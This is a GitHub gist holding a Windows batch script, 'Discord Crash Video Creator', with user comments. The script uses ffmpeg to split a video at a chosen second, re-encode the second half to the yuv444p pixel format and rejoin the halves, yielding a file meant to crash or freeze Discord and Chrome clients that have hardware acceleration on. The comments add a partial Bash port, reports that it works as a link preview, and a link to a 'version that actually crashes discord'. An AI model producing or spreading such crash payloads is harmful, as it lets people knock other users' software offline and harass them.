Skip to content

Instantly share code, notes, and snippets.

@btarg
Created January 18, 2021 01:16
Show Gist options
  • Save btarg/66bc2ead072614ebe9a47c35ae907f99 to your computer and use it in GitHub Desktop.
Save btarg/66bc2ead072614ebe9a47c35ae907f99 to your computer and use it in GitHub Desktop.
Discord Crash Video Creator
@echo off
title Discord Crash Video Creator
color c
echo ========================= NOTE =========================
echo This script creates videos that crash Discord/Chrome.
echo Hardware acceleration must be enabled for it to work.
echo Crash videos will get you banned in some Discord groups!
echo.
echo FFmpeg needs to be installed for this to work:
echo https://youtu.be/qjtmgCb8NcE
echo ========================================================
echo.
pause
WHERE ffmpeg
IF %ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit
color 7
cls
set /p filepath=Enter path to video file (or drag and drop the video here):
set timestamp=1
set /p timestamp=How many seconds in should the video crash?:
echo.
echo Getting video duration...
ffprobe -i %filepath% -show_entries format=duration -v quiet -of csv="p=0" > tmpfile
set /p duration= < tmpfile
del tmpfile
echo Splitting video...
ffmpeg -i %filepath% -ss 0 -t %timestamp% part1.mp4
ffmpeg -i %filepath% -ss %timestamp% -t %duration% part2.mp4
echo Changing video properties...
ffmpeg -i part2.mp4 -pix_fmt yuv444p part2_new.mp4
echo Creating file list...
echo file part1.mp4> file_list.txt
echo file part2_new.mp4>> file_list.txt
echo Creating output file...
ffmpeg -f concat -safe 0 -i file_list.txt -codec copy output.mp4
echo Cleaning up old files...
del part1.mp4
del part2.mp4
del part2_new.mp4
del file_list.txt
color a
echo Output video created! It is located at "%CD%\output.mp4"
echo.
pause
@Dragon911XX
Copy link

Dragon911XX commented May 19, 2021

This one produces a different type of crash than other ones I've seen. It kind of just heavily lags my discord for a while, instead of restarting and disconnecting/reconnecting to the channel if you're in one.

Also this video I found works while hardware acceleration is off, but this program doesn't work with hardware acceleration off.

@Darciukas
Copy link

I have hardware acceleration off, it still does absolutely nothing

@f0op
Copy link

f0op commented May 20, 2021

How would I tell it where ffmpeg is installed?

@wickersoft
Copy link

Works great as of mid may, also as link preview

@wickersoft
Copy link

How would I tell it where ffmpeg is installed?

add it to your PATH or change all ffmpeg commands to the full path of your exe

Copy link

ghost commented May 24, 2021

I've been trying to convert this to BASH for use in Linux, because Wine CMD can't use ffmpeg (to my knowledge). Problem is I know almost nothing about writing bash or reading batch, so it's a slow and messy process. But here is what ive got so far:

`#!/bin/bash

echo ========================= NOTE =========================
echo This script creates videos that crash Discord/Chrome.
echo Hardware acceleration must be enabled for it to work.
echo Crash videos will get you banned in some Discord groups!
echo -
echo FFmpeg needs to be installed for this to work
echo ========================================================
echo -
echo -

#set location [THIS NEEDS REWORK, idk how to store dir path into var]
echo What video do you want to use? [Full Path]
echo :
read PATHVID
echo Where is the output folder? [Full Path]
echo :
read PATHDIR

#set crash point
echo How many seconds in should the video crash?
echo -
read TIME

#set duration
echo Getting video duration...
ffprobe -i $PATHVID -show_entries format=duration -v quiet -of csv="p=0" > tmpfile
DUR= < tmpfile
rm tmpfile

#split video
echo Splitting video...
ffmpeg -i $PATHVID -ss 0 -t $TIME part1.mp4
sleep
ffmpeg -i $PATHVID -ss $TIME -t $DUR part2.mp4

TO BE CONTINUED

`

@Incognito-100
Copy link

if anyone wants i made a version that actually crashes discord
https://gist.github.com/Incognito-100/83e188f3160a5afcd49743e35c7c9d2b

@mattfbacon
Copy link

@hedgeridge If you use Bash do you really need the script?

@btarg
Copy link
Author

btarg commented Jun 10, 2021

the videos produced from this dindn't crash discord

hardware accel needs to be on

@wickersoft
Copy link

wickersoft commented Mar 1, 2022

Man you can't just dump files into your system32. Run it in a normal directory like your desktop.

@lil-grumm-x
Copy link

How do you use it?

@lil-grumm-x
Copy link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment